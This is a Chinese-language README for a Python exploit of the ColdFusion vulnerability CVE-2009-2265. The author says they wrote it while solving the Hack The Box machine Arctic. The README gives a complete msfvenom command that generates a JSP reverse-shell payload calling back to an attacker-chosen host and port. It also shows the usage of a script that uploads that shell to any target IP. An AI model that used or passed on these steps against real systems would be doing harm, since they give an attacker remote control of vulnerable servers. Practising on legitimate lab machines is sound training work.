基于 https://cvedetails.com/cve/CVE-2009-2265/ 的 coldfusion 漏洞利用
我为这个特定 CVE 编写 Python 脚本的主要原因是,在我试图解决 HTB 机器 Arctic 时,Metasploit 的同款利用模块对我不起作用。另外,稍微练习一下 Python 也不错。不过,还有一个由 Alexander Reid 最初编写的同款漏洞 Python 利用版本,如果你更愿意使用他的版本的话。
使用方法非常简单:
请确保你已创建好一个 payload 文件
例如,使用 msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
用法:python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
可选参数:
-h, --help 显示此帮助信息并退出
-t TARGET 目标 IP
-p PORT 目标端口
-f FILEPATH 要上传的 shellcode 文件路径
-b BASEPATH coldfusion 基础路径